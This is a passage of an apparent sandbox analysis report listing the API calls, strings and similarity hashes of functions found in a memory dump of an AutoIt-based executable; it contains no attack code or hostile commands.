                                                                                                                    • Part of subcall function 00D73B1E: _wcsncpy.LIBCMT ref: 00D73B32
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: DesktopFolderFromListMallocPath_wcsncpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3981382179-0
                                                                                                                  • Opcode ID: 7b6c0ca870d15a83349d5ee4298ad9f46584aff393b1565fff26f7c6085d9e94
                                                                                                                  • Instruction ID: ceeeef475bf77277466b9fcd7d686d899669e3b1881cd1fad28570f17328f9b0
                                                                                                                  • Opcode Fuzzy Hash: 7b6c0ca870d15a83349d5ee4298ad9f46584aff393b1565fff26f7c6085d9e94
                                                                                                                  • Instruction Fuzzy Hash: 74213D76B00214ABCB14DF95D884DAEB7BEEF88714B1480A4F509D7251EB309E46DBA0
                                                                                                                  APIs
                                                                                                                  • __FF_MSGBANNER.LIBCMT ref: 00D94603
                                                                                                                    • Part of subcall function 00D98E52: __NMSG_WRITE.LIBCMT ref: 00D98E79
                                                                                                                    • Part of subcall function 00D98E52: __NMSG_WRITE.LIBCMT ref: 00D98E83
                                                                                                                  • __NMSG_WRITE.LIBCMT ref: 00D9460A
                                                                                                                    • Part of subcall function 00D98EB2: GetModuleFileNameW.KERNEL32(00000000,00E30312,00000104,?,00000001,00D90127), ref: 00D98F44
                                                                                                                    • Part of subcall function 00D98EB2: ___crtMessageBoxW.LIBCMT ref: 00D98FF2
                                                                                                                    • Part of subcall function 00D91D65: ___crtCorExitProcess.LIBCMT ref: 00D91D6B
                                                                                                                    • Part of subcall function 00D91D65: ExitProcess.KERNEL32 ref: 00D91D74
                                                                                                                    • Part of subcall function 00D9889E: __getptd_noexit.LIBCMT ref: 00D9889E
                                                                                                                  • RtlAllocateHeap.NTDLL(01790000,00000000,00000001), ref: 00D9462F
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1372826849-0
                                                                                                                  • Opcode ID: 8fef7530d2fde95b7cdb899a07c2f48c13b8130883689daaba6f7a55cc0e6f95
                                                                                                                  • Instruction ID: dcc75978ba5dc6be919f7817c8ea89505b14d0063c46548061e479f0518f419c
                                                                                                                  • Opcode Fuzzy Hash: 8fef7530d2fde95b7cdb899a07c2f48c13b8130883689daaba6f7a55cc0e6f95
                                                                                                                  • Instruction Fuzzy Hash: 5B018C71601301AEEF202B69A852FBA2B48EBC3B61F15012AF605DB582DEA1DC429674
                                                                                                                  APIs
                                                                                                                  • TranslateMessage.USER32(?), ref: 00D7E646
                                                                                                                  • DispatchMessageW.USER32(?), ref: 00D7E651
                                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00D7E664
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Message$DispatchPeekTranslate
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4217535847-0
                                                                                                                  • Opcode ID: 57792823217053ac129020b176761e7ebb38b1429a1e6a2f11b706f18a027a62
                                                                                                                  • Instruction ID: 4e9b29aa077c9ccfbdefea9fc925d478f8e40407369c437d0ce0c323704a1c0a
                                                                                                                  • Opcode Fuzzy Hash: 57792823217053ac129020b176761e7ebb38b1429a1e6a2f11b706f18a027a62
                                                                                                                  • Instruction Fuzzy Hash: 5CF0FE7160434597DB10E7E18C46B6BB79DAB98744F184C7DB645C2180E6B0D5048732
                                                                                                                  APIs
                                                                                                                  • _free.LIBCMT ref: 00DBC45E
                                                                                                                    • Part of subcall function 00D928CA: RtlFreeHeap.NTDLL(00000000,00000000,?,00D98715,00000000,00D988A3,00D94673,?), ref: 00D928DE
                                                                                                                    • Part of subcall function 00D928CA: GetLastError.KERNEL32(00000000,?,00D98715,00000000,00D988A3,00D94673,?), ref: 00D928F0
                                                                                                                  • _free.LIBCMT ref: 00DBC46F
                                                                                                                  • _free.LIBCMT ref: 00DBC481
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 776569668-0
                                                                                                                  • Opcode ID: 409dc5471866d52cb660d3acacbc6baa69eb1666097d1b0fc545827c793d8a90
                                                                                                                  • Instruction ID: fc99b0f3f0cd48ed45dd2ad2a38bb5d55449705f4fe145ed40f59725a54623e4
                                                                                                                  • Opcode Fuzzy Hash: 409dc5471866d52cb660d3acacbc6baa69eb1666097d1b0fc545827c793d8a90
                                                                                                                  • Instruction Fuzzy Hash: E6E0E2A1610701E6CF24AA79A854BF763CCAB04761B18586EF45AD7182DF28F9408138
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: CALL
                                                                                                                  • API String ID: 0-4196123274
                                                                                                                  • Opcode ID: 7d214813be0511f4962d47498e22eb334f2a96477f80ced1ba573e42a95e9ad0
                                                                                                                  • Instruction ID: 0f0a8dc11043110ca307b9d1640f3f9892016a0ab2b5978854d38913bbba7d70
                                                                                                                  • Opcode Fuzzy Hash: 7d214813be0511f4962d47498e22eb334f2a96477f80ced1ba573e42a95e9ad0
                                                                                                                  • Instruction Fuzzy Hash: 8E227D74508341DFD764EF24C495A2ABBE1FF84304F18896DE99A8B361D731E889CF62
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D716F2: RegisterClipboardFormatW.USER32(WM_GETCONTROLNAME), ref: 00D71751
                                                                                                                  • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00D7159B
                                                                                                                  • CoInitialize.OLE32(00000000), ref: 00D71612
                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00DE58F7
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Handle$ClipboardCloseFormatInitializeRegister
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 458326420-0
                                                                                                                  • Opcode ID: 90f16461b740438ec2a30b83638891341e527e14774130c9401db48e50639075
                                                                                                                  • Instruction ID: a23d81e707ddbc3b8c0ce1b7e7dabf6c1f00198674b15a70123d0a0bb3b60254
                                                                                                                  • Opcode Fuzzy Hash: 90f16461b740438ec2a30b83638891341e527e14774130c9401db48e50639075
                                                                                                                  • Instruction Fuzzy Hash: 1B71AAB49053499EC314DFABB89A454BFE5FB9934479892EED02AB7362DB304448CF21
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _memmove
                                                                                                                  • String ID: EA06
                                                                                                                  • API String ID: 4104443479-3962188686
                                                                                                                  • Opcode ID: 2fa42c4a2bf7582a8cb9639cad6106d48c16d47430a6d9fa143fb08d19234c0c
                                                                                                                  • Instruction ID: 0a0a31269d66dd42f8b6dd360da9be7cee9fa4f74be06d25a53ec47522951ba9
                                                                                                                  • Opcode Fuzzy Hash: 2fa42c4a2bf7582a8cb9639cad6106d48c16d47430a6d9fa143fb08d19234c0c
                                                                                                                  • Instruction Fuzzy Hash: 7A415E21A042589BCB13AB548D617BE7FA6DB55300F9CC565ED8AEB182F721CD8087B1
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcscmp
                                                                                                                  • String ID: 0.0.0.0
                                                                                                                  • API String ID: 856254489-3771769585
                                                                                                                  • Opcode ID: f65107df5f33cac81a68daeac7ba7cddb783a534f9584f5ca7313ca16500b783
                                                                                                                  • Instruction ID: 287b1d9ba0a5309b36cb5b9fc01fca003254bb3a6de72a024585b3b85a783e8e
                                                                                                                  • Opcode Fuzzy Hash: f65107df5f33cac81a68daeac7ba7cddb783a534f9584f5ca7313ca16500b783
                                                                                                                  • Instruction Fuzzy Hash: D511E035604305EFCB04EB64C981EA9F3A9EF94710B18805DF50AAF391EA70ED818BB0
                                                                                                                  APIs
                                                                                                                  • _memset.LIBCMT ref: 00DE3CF1
                                                                                                                    • Part of subcall function 00D731B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 00D731DA
                                                                                                                    • Part of subcall function 00D73A67: SHGetMalloc.SHELL32(00D73C31), ref: 00D73A7D
                                                                                                                    • Part of subcall function 00D73A67: SHGetDesktopFolder.SHELL32(?), ref: 00D73A8F
                                                                                                                    • Part of subcall function 00D73A67: SHGetPathFromIDListW.SHELL32(?,?), ref: 00D73AD2
                                                                                                                    • Part of subcall function 00D73B45: GetFullPathNameW.KERNEL32(?,00000104,?,?,00E322E8,?), ref: 00D73B65
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Path$FullName$DesktopFolderFromListMalloc_memset
                                                                                                                  • String ID: X
                                                                                                                  • API String ID: 2727075218-3081909835
                                                                                                                  • Opcode ID: 00620e8ac3ffb0ad0e3e099f6c7f951f90762e12a929e297dcaf9390f12809bf
                                                                                                                  • Instruction ID: ed8d2fca3f7084532bad6259facc23c2ebf88f7a6ce733d480f59580eaf5ae5d
                                                                                                                  • Opcode Fuzzy Hash: 00620e8ac3ffb0ad0e3e099f6c7f951f90762e12a929e297dcaf9390f12809bf
                                                                                                                  • Instruction Fuzzy Hash: 0911A7B1A00298ABCF05EFA4D8066EE7BF9AF45704F04800DE515BB241DBB446499FB1
                                                                                                                  Strings
                                                                                                                  • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 00DE34AA
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: LibraryLoad
                                                                                                                  • String ID: >>>AUTOIT NO CMDEXECUTE<<<
                                                                                                                  • API String ID: 1029625771-2684727018
                                                                                                                  • Opcode ID: 19a9e6e3543520a2ce45a51f1bfcd49a81d72a005993622b58bc20f032f572b0
                                                                                                                  • Instruction ID: 57550f4d5d09419f6c8a2553a150f7b02a617ff0eea88acdfa32da69e8334463
                                                                                                                  • Opcode Fuzzy Hash: 19a9e6e3543520a2ce45a51f1bfcd49a81d72a005993622b58bc20f032f572b0
                                                                                                                  • Instruction Fuzzy Hash: 98F04F71944249AA8F15FEA4C8918FFB778AA10304B14C526F86A92082FB349B09DB30
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00DB6623: SetFilePointerEx.KERNEL32(?,?,?,00000000,00000001,00000003,?,00DB685E,?,?,?,00DE4A5C,00E0E448,00000003,?,?), ref: 00DB66E2
                                                                                                                  • WriteFile.KERNEL32(?,?,",00000000,00000000,?,?,?,00DE4A5C,00E0E448,00000003,?,?,00D74C44,?,?), ref: 00DB686C
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: File$PointerWrite
                                                                                                                  • String ID: "
                                                                                                                  • API String ID: 539440098-357034475
                                                                                                                  • Opcode ID: a87e09ead3d01cca2cbf236f75269d2a726a07e7e2270bd654c04da38acf6cff
                                                                                                                  • Instruction ID: 507802fb68a481694cd4d61ef5f80c702f90bbc13e2e804b3325d2c693e569f9
                                                                                                                  • Opcode Fuzzy Hash: a87e09ead3d01cca2cbf236f75269d2a726a07e7e2270bd654c04da38acf6cff
                                                                                                                  • Instruction Fuzzy Hash: 28E0B636400318FBDB20AF94D805ADABBB9EB04354F10455AF94195151D7B5EA14DBA4
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 1c63765803a337caba0c5bf015462b88ea32afe5a95fba55014c2b55f1c69b4c
                                                                                                                  • Instruction ID: 49b984ecb92426472c61f68f851bd9d8497f42a43da47ce20744d7b70e9d83f3
                                                                                                                  • Opcode Fuzzy Hash: 1c63765803a337caba0c5bf015462b88ea32afe5a95fba55014c2b55f1c69b4c
                                                                                                                  • Instruction Fuzzy Hash: 5251A3316043019FCB14FF29D491BAA77E5EF88324F14856DF99A8B292DB30E805CB72
                                                                                                                  APIs
                                                                                                                  • GetCursorPos.USER32(?), ref: 00DC8074
                                                                                                                  • GetForegroundWindow.USER32 ref: 00DC807A
                                                                                                                    • Part of subcall function 00DC6B19: GetWindowRect.USER32(?,?), ref: 00DC6B2C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$CursorForegroundRect
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1066937146-0
                                                                                                                  • Opcode ID: 531a6990ae3475c18920a4c708e6425a42e0a53724b240b1108557ec2292cd27
                                                                                                                  • Instruction ID: b5a06ae7de7b27e85fcc5b1718a91526a78bc2afe74ecb446638beda73fa54e9
                                                                                                                  • Opcode Fuzzy Hash: 531a6990ae3475c18920a4c708e6425a42e0a53724b240b1108557ec2292cd27
                                                                                                                  • Instruction Fuzzy Hash: 2C311C75900219AFDB10EFA4C881EAEB7F9FF04314F144469E946A7251EB34AE45DB70
                                                                                                                  APIs
                                                                                                                  • IsWindow.USER32(00000000), ref: 00DEDB31
                                                                                                                  • IsWindow.USER32(00000000), ref: 00DEDB6B
                                                                                                                    • Part of subcall function 00D71F04: GetForegroundWindow.USER32 ref: 00D71FBE
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$Foreground
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 62970417-0
                                                                                                                  • Opcode ID: e833ff7639228d91059a0b48bf850716db330a484a8621bbfe505ef058f585c9
                                                                                                                  • Instruction ID: bc71ce43e71ffe342a0f6a64e3a9c473f11bb11116d037341ecf9baf0fe3a89a
                                                                                                                  • Opcode Fuzzy Hash: e833ff7639228d91059a0b48bf850716db330a484a8621bbfe505ef058f585c9
                                                                                                                  • Instruction Fuzzy Hash: 8D21CD72200246AADB20AB35C881BFE77BADF80384F048429F95ED6141EF70EE01D770
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D7193B: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00D71952
                                                                                                                  • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00DAE344
                                                                                                                  • _strlen.LIBCMT ref: 00DAE34F
